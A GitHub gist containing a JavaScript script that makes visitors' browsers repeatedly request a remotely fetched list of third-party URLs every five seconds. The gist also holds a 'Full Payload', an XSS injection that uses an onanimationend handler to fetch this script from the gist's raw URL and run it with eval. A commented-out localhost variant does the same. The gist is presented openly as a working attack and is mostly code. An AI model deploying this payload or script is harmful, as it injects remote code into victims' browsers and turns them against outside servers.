Last active
June 1, 2022 08:03
-
-
Save lostsh/447ba676ef5cf70f9905f79fb6c4934c to your computer and use it in GitHub Desktop.
This script is requesting a lot of resources from client
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
index.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function request(url){ | |
return new Promise((resolve, reject) => { | |
console.log("[+]\tStart request \n[=]\t[%s]", url); | |
var request = new XMLHttpRequest(); | |
request.open('GET', url); | |
request.responseType = 'html/text'; | |
request.onload = function() { | |
if (request.status === 200) { | |
resolve(request.response); | |
} else { | |
reject(Error('Didn\'t load successfully; error code:' + request.statusText)); | |
} | |
}; | |
request.onerror = function() { | |
reject(Error('There was a network error.')); | |
}; | |
// Send the request | |
request.send(); | |
}) | |
} | |
request('https://gist.githubusercontent.com/lostsh/447ba676ef5cf70f9905f79fb6c4934c/raw/urls.json') | |
.then(function(response){ | |
var urls = JSON.parse(response).urls; | |
setInterval(iterateRequest, 5000, urls); | |
}).catch((error)=>console.error(error)); | |
function iterateRequest(array){ | |
array.forEach(element => { | |
request(element).then(res => console.log("OK %s", element)).catch(err => console.error("KO %s", element)); | |
}); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"urls": [ | |
"https://paukyblinders.fr/", | |
"https://lostsh.github.io/", | |
"https://v2.jokeapi.dev/joke/Any?safe-mode", | |
"https://randomuser.me/api/", | |
"https://api.chucknorris.io/jokes/random", | |
"https://catfact.ninja/fact", | |
"https://api.jokes.one/jod" | |
] | |
} |
Using request function
/* How to use the previous
* function to request file
* /
request('https://example.com/')
.then((response)=>console.log(response))
.catch((error)=>console.error(error));
Index file for testing index.html
<!DOCTYPE html>
<script src="requestor.js">
//function pwn(){fetch('http://localhost:8000/requestor.js').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();
</script>
Full Payload
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="function pwn(){fetch('https://gist.githubusercontent.com/lostsh/447ba676ef5cf70f9905f79fb6c4934c/raw/requestor.js').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();"></xss>
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Payload